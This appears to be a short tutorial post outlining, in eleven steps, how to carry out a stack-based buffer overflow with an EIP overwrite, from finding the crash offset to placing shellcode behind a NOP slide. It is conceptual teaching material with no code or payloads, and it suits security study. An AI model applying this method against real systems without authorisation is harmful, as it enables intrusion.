Buffer overflows can be approached almost systematically if there are no memory exploitation defense mechanisms in place. This post will go over the basic steps to successfully execute a stack-based buffer overflow attack to achieve code execution with an EIP overwrite.

Steps to Success

  1. Identify that buffer that will overflow.
  2. Determine the length of the buffer which would cause the crash
  3. Determine the offset of the instruction pointer
  4. Determine bad characters that will cause the exploit to fail
  5. Determine what register(s) we will be able to write to using our buffer
  6. If necessary, send staged payload if none of the registers have easy access to our buffer
  7. Find a loaded module with the least memory exploit protections and find a JMP instruction which will JMP to the register found in step 5.
  8. Overwrite EIP with JMP address from step 7.
  9. Generate shellcode within the allotted restrictions
  10. Prepend a sufficiently long NOP slide to your shellcode
  11. Place the shellcode in the register identified in step 5